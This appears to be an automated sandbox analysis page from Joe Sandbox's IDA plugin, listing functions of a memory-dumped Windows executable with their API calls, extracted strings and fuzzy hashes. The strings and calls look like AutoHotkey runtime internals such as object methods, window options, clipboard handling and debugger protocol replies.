API ID: __wcsicoll
String ID: Add$Check$Click$Color$Default$Delete$DeleteAll$Disable$Enable$Icon$Insert$MainWindow$NoDefault$NoIcon$NoMainWindow$NoStandard$Rename$Show$Standard$Tip$ToggleCheck$ToggleEnable$Uncheck$UseErrorLevel
API String ID: 3832890014-1790574973
Opcode ID: 0bf2662bfcbc2b0c3fe13fb78dcaef2af294648aaf6f6a884d6dce56df9762c0
Instruction ID: 849569b1e96088470b911d2138e05532eafce64e79e4480a305f33f393b13257
Opcode Fuzzy Hash: 0bf2662bfcbc2b0c3fe13fb78dcaef2af294648aaf6f6a884d6dce56df9762c0
Instruction Fuzzy Hash: 87413855A41A1132EE11212E9D03BDF25499BA374BFC5807BFC08C5382FB8DDA5990EE

Uniqueness

Uniqueness Score: -1.00%

Function 004771F0, Relevance: 59.7, APIs: 17, Strings: 17, Instructions: 178COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0047721F
__wcsicoll.LIBCMT ref: 0047723C
__wcsicoll.LIBCMT ref: 0047726E
__wcsicoll.LIBCMT ref: 00477282
__wcsicoll.LIBCMT ref: 0047729B
__wcsicoll.LIBCMT ref: 004772B4
__wcsicoll.LIBCMT ref: 004772FC

Strings

Push, xrefs: 00477236
Clone, xrefs: 00477383
Delete, xrefs: 00477295
Length, xrefs: 00477219
GetCapacity, xrefs: 00477349
Remove, xrefs: 004773E7
MaxIndex, xrefs: 0047739C
GetAddress, xrefs: 00477330
SetCapacity, xrefs: 00477366
HasKey, xrefs: 004772F6
Pop, xrefs: 0047724F
RemoveAt, xrefs: 0047727C
MinIndex, xrefs: 004773B5
InsertAt, xrefs: 00477268
Count, xrefs: 004772AE
NewEnum, xrefs: 00477313
Insert, xrefs: 004773CE

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Clone$Count$Delete$GetAddress$GetCapacity$HasKey$Insert$InsertAt$Length$MaxIndex$MinIndex$NewEnum$Pop$Push$Remove$RemoveAt$SetCapacity
API String ID: 3832890014-408958126
Opcode ID: 00480980e32effde9b3b9f6c3da616a18afb4b777ac3835046155b2834f36e14
Instruction ID: ff0e28c2847901468f64bb168b498fd1b73154d001ea664e718816f8904d7a07
Opcode Fuzzy Hash: 00480980e32effde9b3b9f6c3da616a18afb4b777ac3835046155b2834f36e14
Instruction Fuzzy Hash: B0414252A4C12122DE21312DBC02BDB29484BA231EF5644BBFC0C95396F74DEA9695EE

Uniqueness

Uniqueness Score: -1.00%

Function 0041C220, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 107COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041C238
__wcsicoll.LIBCMT ref: 0041C24E
__wcsicoll.LIBCMT ref: 0041C264

Part of subcall function 00498079: __wcsicmp_l.LIBCMT ref: 004980F9

__wcsicoll.LIBCMT ref: 0041C27C
__wcsicoll.LIBCMT ref: 0041C292
__wcsicoll.LIBCMT ref: 0041C2A8

Strings

Trans, xrefs: 0041C232
TransColor, xrefs: 0041C25E
Style, xrefs: 0041C2D2
Topmost, xrefs: 0041C28C
Redraw, xrefs: 0041C302
ExStyle, xrefs: 0041C2EA
Region, xrefs: 0041C34A
Disable, xrefs: 0041C332
Bottom, xrefs: 0041C2A2
Top, xrefs: 0041C2BA
Enable, xrefs: 0041C31A
Transparent, xrefs: 0041C248
AlwaysOnTop, xrefs: 0041C276

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$__wcsicmp_l
String ID: AlwaysOnTop$Bottom$Disable$Enable$ExStyle$Redraw$Region$Style$Top$Topmost$Trans$TransColor$Transparent
API String ID: 3172861507-906520268
Opcode ID: 30ea7971964ed2fa34c0d9f337a53fcd5413cdb3b4764f7ca6dd86e228fd903d
Instruction ID: a6728a93a84ff7ead91a6d1538de1abeb4cce6f4c21cf7fda6e37d69f56fc794
Opcode Fuzzy Hash: 30ea7971964ed2fa34c0d9f337a53fcd5413cdb3b4764f7ca6dd86e228fd903d
Instruction Fuzzy Hash: 2F214F51A8162522DE11216D9D43BDF38585BA3F4BF96807BFC18D12C2FB8DCA5980BE

Uniqueness

Uniqueness Score: -1.00%

Function 0041C100, Relevance: 36.8, APIs: 11, Strings: 10, Instructions: 91COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041C118
__wcsicoll.LIBCMT ref: 0041C130
__wcsicoll.LIBCMT ref: 0041C146
__wcsicoll.LIBCMT ref: 0041C15C

Strings

Cap, xrefs: 0041C1FA
Serial, xrefs: 0041C188
Label, xrefs: 0041C156
List, xrefs: 0041C112
Type, xrefs: 0041C1A0
Status, xrefs: 0041C1B8
SetLabel:, xrefs: 0041C170
FileSystem, xrefs: 0041C12A
StatusCD, xrefs: 0041C1D0
Capacity, xrefs: 0041C1E8

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Cap$Capacity$FileSystem$Label$List$Serial$SetLabel:$Status$StatusCD$Type
API String ID: 3832890014-1446549340
Opcode ID: c42482dd9e340dc94333f8e40b4cad9df56b9150b2f93f45b8ffe1beb639fe37
Instruction ID: 84ef5ec2b795afd31a3551c4ac8eaba3b4f1d51b4c35c5bb8532503ca6b89eab
Opcode Fuzzy Hash: c42482dd9e340dc94333f8e40b4cad9df56b9150b2f93f45b8ffe1beb639fe37
Instruction Fuzzy Hash: 64112C55AC161132EE11216E9D43BDF24480FA3B47F96407BBC08E5383FB8DEA5991BE

Uniqueness

Uniqueness Score: -1.00%

Function 0045C3C0, Relevance: 33.7, APIs: 13, Strings: 6, Instructions: 460windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BF10: __wcsicoll.LIBCMT ref: 0041BF28

Part of subcall function 0044D1B0: GetForegroundWindow.USER32(?,?,0043FD55,?), ref: 0044D1DE
Part of subcall function 0044D1B0: IsWindowVisible.USER32(00000000), ref: 0044D1F9

SendMessageTimeoutW.USER32 ref: 0045C438
IsWindowEnabled.USER32(00000000), ref: 0045C46C
IsWindowVisible.USER32(00000000), ref: 0045C496
SendMessageTimeoutW.USER32 ref: 0045C4D4
GetClassNameW.USER32 ref: 0045C50A
GetClassNameW.USER32 ref: 0045C567
SendMessageTimeoutW.USER32 ref: 0045C5CB
SendMessageTimeoutW.USER32 ref: 0045C5F1
SendMessageTimeoutW.USER32 ref: 0045C64A
GetClassNameW.USER32 ref: 0045C6EF

Strings

$%K, xrefs: 0045C49E
SysListView32, xrefs: 0045C6F8
Combo, xrefs: 0045C513, 0045C570, 0045C725
$%K, xrefs: 0045C44A
List, xrefs: 0045C52A, 0045C591, 0045C74A
$%K, xrefs: 0045C474

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSendTimeout$Window$ClassName$Visible$EnabledForeground__wcsicoll
String ID: $%K$$%K$$%K$Combo$List$SysListView32
API String ID: 4132077911-2785370876
Opcode ID: d9103a46f814f5ad026ded408b91e18ad76d4a4fbffb08bddc772f361dcef8ae
Instruction ID: e215e50286f728643e45484ffa6b0e1f131dc622dfba2982d500de78d91f616e
Opcode Fuzzy Hash: d9103a46f814f5ad026ded408b91e18ad76d4a4fbffb08bddc772f361dcef8ae
Instruction Fuzzy Hash: 99F1B271A00305AFDB209A959CC6FAF73B8EB45715F10421BF910AB2C2D778ED468B99

Uniqueness

Uniqueness Score: -1.00%

Function 00467110, Relevance: 33.7, APIs: 13, Strings: 6, Instructions: 414COMMON

Download Yara Rule

Strings

%sX, xrefs: 004672E6
%sW, xrefs: 004673BA
$%K, xrefs: 004674C6
%sY, xrefs: 00467350
%sH, xrefs: 00467422
$%K, xrefs: 00467499

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcstoui64
String ID: $%K$$%K$%sH$%sW$%sX$%sY
API String ID: 3882282163-1609371329
Opcode ID: 62ccc6f539795680abc96bade14a484671b05178b95871e31c8162a8e489b522
Instruction ID: d8f9834ad133359f3cebadd0eff8eb51380880d475cae3756aba569a76f9792f
Opcode Fuzzy Hash: 62ccc6f539795680abc96bade14a484671b05178b95871e31c8162a8e489b522
Instruction Fuzzy Hash: F9E1CFB1708201ABD310DF19DC85F6B77A9AB84718F104A6FF9458B391DB78EC41CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0046F2D0, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 358windowCOMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0046F2EC
SendMessageW.USER32(00000001,00000472,00000000,00000000), ref: 0046F326
SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0046F37B
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0046F397
SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0046F3AF
SendMessageW.USER32(?,00000408,00000000,00000000), ref: 0046F3E5
SendMessageW.USER32(?,00001001,00000000,?), ref: 0046F414
GetWindowLongW.USER32(?,000000F0), ref: 0046F461
SendMessageW.USER32(?,00001005,00000000,?), ref: 0046F47A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0046F507
__wcsicoll.LIBCMT ref: 0046F536

Strings

}rF, xrefs: 0046F46D, 0046F480, 0046F471
Text, xrefs: 0046F530
Submit, xrefs: 0046F2E4

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$__wcsicoll$LongWindow
String ID: Submit$Text$}rF
API String ID: 4045105239-3884017633
Opcode ID: ccdfb294b86aa0ad84a8d9cc539db335efac485f26fd66e3b0680127da0b752c
Instruction ID: f1afd10cbae422122c14a4aa57a7880a7e73c32e446bc6717d3c337833289634
Opcode Fuzzy Hash: ccdfb294b86aa0ad84a8d9cc539db335efac485f26fd66e3b0680127da0b752c
Instruction Fuzzy Hash: E7B1817234430067D320AB75AC82F677398EB95715F20467FFA84EB2C1D6B9E809875D

Uniqueness

Uniqueness Score: -1.00%

Function 00481240, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 268clipboardCOMMON

Download Yara Rule

APIs

EnumClipboardFormats.USER32(00000000,-00000001,?,?,?,004D870C), ref: 00481283
GlobalSize.KERNEL32(00000000), ref: 004812C5
EnumClipboardFormats.USER32(00000000,?,?,004D870C), ref: 004812EC
GlobalUnlock.KERNEL32(00000000,?,?,004D870C), ref: 00481316
CloseClipboard.USER32(?,?,004D870C), ref: 00481322

Strings

Can't open clipboard for reading., xrefs: 00481256
Out of memory., xrefs: 0048140B

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Clipboard$EnumFormatsGlobal$CloseSizeUnlock
String ID: Can't open clipboard for reading.$Out of memory.
API String ID: 1341988473-4067353709
Opcode ID: e4594048ea3ac502f4aa43fbca4db5ae1b33f4a1bf3c5652e62d6bc253bba6f3
Instruction ID: 27a1ac81c07c8520c9e4f49393c3dfe6124d497154f370863833dfe64b9c6c73
Opcode Fuzzy Hash: e4594048ea3ac502f4aa43fbca4db5ae1b33f4a1bf3c5652e62d6bc253bba6f3
Instruction Fuzzy Hash: DE91D172A013019BC720AF58EC8466FB7E8EB85B50F54482FE84593361DB3CD946CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 004061B8, Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 190COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 004061F0

Strings

<response command="feature_get" feature_name="%e" supported="%i" transaction_id="%e">%s</response>, xrefs: 004063AC
max_data, xrefs: 004062CD
language_, xrefs: 004061DF
max_depth, xrefs: 0040631C
supports_async, xrefs: 00406289
version, xrefs: 00406238
protocol_version, xrefs: 00406275
breakpoint_types, xrefs: 0040629D
multiple_sessions, xrefs: 004062B9
max_children, xrefs: 004062F7
supports_threads, xrefs: 004061FE
name, xrefs: 0040621B
encoding, xrefs: 00406259
line, xrefs: 004062AB

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _strncmp
String ID: <response command="feature_get" feature_name="%e" supported="%i" transaction_id="%e">%s</response>$breakpoint_types$encoding$language_$line$max_children$max_data$max_depth$multiple_sessions$name$protocol_version$supports_async$supports_threads$version
API String ID: 909875538-208239478
Opcode ID: bb40b16782e234427f401bd57e87437aba9f94b3747c3e1014e8a28210dceb8e
Instruction ID: 67c986e1ea23358dad69bf1787bfeba8435f1f24894072b833f71a820d72fd15
Opcode Fuzzy Hash: bb40b16782e234427f401bd57e87437aba9f94b3747c3e1014e8a28210dceb8e
Instruction Fuzzy Hash: 46513A73704208BBDB248E908C41B963B55AB22314F1A807BFC06BF2C1D77A8D5557DD

Uniqueness

Uniqueness Score: -1.00%

Function 0046A11C, Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 255windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 0046A1A5
SendMessageW.USER32(00000000,00001004,0000016E,00000000), ref: 0046A1CE
SendMessageW.USER32(?,00001012,?,?), ref: 0046A1F1
SendMessageW.USER32(?,00001002,00000000,?), ref: 0046A26B
SendMessageW.USER32(?,0000100A,00000001,?), ref: 0046A28D
SendMessageW.USER32(?,00000030,?,?), ref: 0046A2B8
SendMessageW.USER32(?,00001009,00000000,?), ref: 0046A2ED
SendMessageW.USER32(?,00001015,00000000,00000000), ref: 0046A319
GetDC.USER32(?), ref: 0046A3A8
SelectObject.GDI32(00000000,?), ref: 0046A3CA
GetTextMetricsW.GDI32(00000000,?,?,00001009,00000000,?,?,?,?,00000000), ref: 0046A3E1
MoveWindow.USER32(00000000,?,?,00000000,?,00000001,?,00001009,00000000,?,?,?,?,00000000), ref: 0046A474

Strings

SysMonthCal32, xrefs: 0046A19F
Can't create control., xrefs: 0046AB50

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$Window$CreateMetricsMoveObjectSelectText
String ID: Can't create control.$SysMonthCal32
API String ID: 291046171-3692857110
Opcode ID: 8d1409efa12413044e2b2f477ded999edb727e83e38f80b94d4dd7b6e108b536
Instruction ID: ee765c19ca498e96e78146a2a63e7e4e76ab3fd705c8d790c4bc2cc1030f815b
Opcode Fuzzy Hash: 8d1409efa12413044e2b2f477ded999edb727e83e38f80b94d4dd7b6e108b536
Instruction Fuzzy Hash: 95A13A70A48381AFD734CB14C894BABB7E5FB89704F10491EE98997390E778A841CF5B

Uniqueness

Uniqueness Score: -1.00%

Function 004050A0, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 74clipboardCOMMON

Download Yara Rule

APIs

GetClipboardFormatNameW.USER32(0000000D,00000104,00000104), ref: 004050CC
__wcsnicmp.LIBCMT ref: 004050DE
__wcsicoll.LIBCMT ref: 004050F7
__wcsicoll.LIBCMT ref: 0040510C
__wcsicoll.LIBCMT ref: 00405121
__wcsicoll.LIBCMT ref: 00405136
__wcsicoll.LIBCMT ref: 0040514B
__wcsicoll.LIBCMT ref: 00405160
GetClipboardData.USER32 ref: 00405186

Strings

Embed Source, xrefs: 00405130
ObjectLink, xrefs: 004050F1
MSDEVColumnSelect, xrefs: 00405145
Native, xrefs: 0040511B
MSDEVLineSelect, xrefs: 0040515A
Link Source, xrefs: 004050D8
OwnerLink, xrefs: 00405106

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$Clipboard$DataFormatName__wcsnicmp
String ID: Embed Source$Link Source$MSDEVColumnSelect$MSDEVLineSelect$Native$ObjectLink$OwnerLink
API String ID: 3127108255-1844231336
Opcode ID: f4d25fb591d1f3ce3e3e7ae087564694b5004430154c508a06d909d1d9f1022c
Instruction ID: 9674a832bd9d4d3b88eae5f281089e51eaed792376d67bd0fc05c6a5212559fc
Opcode Fuzzy Hash: f4d25fb591d1f3ce3e3e7ae087564694b5004430154c508a06d909d1d9f1022c
Instruction Fuzzy Hash: 3111A570D0070166EB20E769CC42F2B76B99F52705F54493EBC58D52C1FBBCD908CAAA

Uniqueness

Uniqueness Score: -1.00%

Function 004410F0, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 316COMMON

Download Yara Rule

APIs

SetWindowRgn.USER32(?,00000000,00000001), ref: 00441116

Strings

ind, xrefs: 00441236

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Window
String ID: ind
API String ID: 2353593579-166120149
Opcode ID: a781c6bc558a84894ea8159fb30cf898e02bcb9b9bf44ec61f164b8c00c92227
Instruction ID: d12ed1e83ad582b668750394f7e6bd7802d412668f1b65aec4824950969f9d93
Opcode Fuzzy Hash: a781c6bc558a84894ea8159fb30cf898e02bcb9b9bf44ec61f164b8c00c92227
Instruction Fuzzy Hash: DDA136B29043109AF7309B559C85B7B77E8AF92750F18052FF841D62A0E2AD9DC583AF

Uniqueness

Uniqueness Score: -1.00%

Function 00452140, Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 271COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 004521F7
__wcsicoll.LIBCMT ref: 00452234
__wcsicoll.LIBCMT ref: 004522BC
__wcsicoll.LIBCMT ref: 004522F9
__wcsicoll.LIBCMT ref: 00452336
__wcsicoll.LIBCMT ref: 0045236E
__wcsicoll.LIBCMT ref: 004523AE
__wcsicoll.LIBCMT ref: 004523ED

Strings

Name, xrefs: 00452368
Len, xrefs: 004522F3
Mark, xrefs: 004523A8
Value, xrefs: 004523E7
Count, xrefs: 00452330
Pos, xrefs: 004522B6

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Count$Len$Mark$Name$Pos$Value
API String ID: 3832890014-945282619
Opcode ID: c437baeeb957d3f6f094edd2482739e1175a87984d60d150036e17de3dc1f3ab
Instruction ID: 68675ac475a7596e22f3a1363d7010c6cbbe1d474ee3c7867788a204edac6e36
Opcode Fuzzy Hash: c437baeeb957d3f6f094edd2482739e1175a87984d60d150036e17de3dc1f3ab
Instruction Fuzzy Hash: FE91F3356002059BC730CE19DA8076B73A0EB97316F1445AFEC458B383D7B9E95ECBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004491CB, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 004491D1
__wcsicoll.LIBCMT ref: 004491E8
GetDriveTypeW.KERNEL32 ref: 0044927C

Strings

CDRom, xrefs: 004491CB
Ramdisk, xrefs: 00449227
Unknown, xrefs: 0044923E
Removable, xrefs: 004491E2
:, xrefs: 0044926F
Network, xrefs: 00449210
Fixed, xrefs: 004491F9

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$DriveType
String ID: :$CDRom$Fixed$Network$Ramdisk$Removable$Unknown
API String ID: 1799469517-2138212569
Opcode ID: aefad1e0537c74150088cf60bf88c39498d8fa90d233f4343d82e87b3d12aec0
Instruction ID: 9faed42b2714232264f13a0626beefeae0a085233681bd577a22b4b6d74b5de6
Opcode Fuzzy Hash: aefad1e0537c74150088cf60bf88c39498d8fa90d233f4343d82e87b3d12aec0
Instruction Fuzzy Hash: 3B313A3264430079E610DB15DC42B6FB3A4AFD1354F11482FF804A6250E7BC9D16E66F

Uniqueness

Uniqueness Score: -1.00%

Function 0041E22B, Relevance: 23.1, APIs: 4, Strings: 9, Instructions: 304COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0041E254
SetCurrentDirectoryW.KERNEL32(004AE8F8), ref: 0041E2C0

Part of subcall function 00403A50: _free.LIBCMT ref: 00403A84
Part of subcall function 00403A50: _free.LIBCMT ref: 00403ABA
Part of subcall function 00403A50: _free.LIBCMT ref: 00403ADD

Strings

stopped, xrefs: 0041E59E
step_over, xrefs: 0041E56E
OnExit, xrefs: 0041E313
step_out, xrefs: 0041E575
error, xrefs: 0041E549, 0041E59D
@cM, xrefs: 0041E27A
<response command="%s" status="%s" reason="%s" transaction_id="%e"/>, xrefs: 0041E5A4
step_into, xrefs: 0041E567
run, xrefs: 0041E57C, 0041E5A3

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _free$CurrentDirectory_wcsncpy
String ID: <response command="%s" status="%s" reason="%s" transaction_id="%e"/>$@cM$OnExit$error$run$step_into$step_out$step_over$stopped
API String ID: 255563260-491145388
Opcode ID: 0174cb071ff0c11e076fe1675cdca12f2828d83454aef69cd219ddfa4fe99e7d
Instruction ID: f49f2da72e73106a261b503ad905924e8217ffe4d85aeeb3d0ee5ee821ee47e1
Opcode Fuzzy Hash: 0174cb071ff0c11e076fe1675cdca12f2828d83454aef69cd219ddfa4fe99e7d
Instruction Fuzzy Hash: C9C1D4796052409FD310DF6AD880AAB7BE5EB95308F44847FEC458B3A2D738EC85CB59

Uniqueness

Uniqueness Score: -1.00%

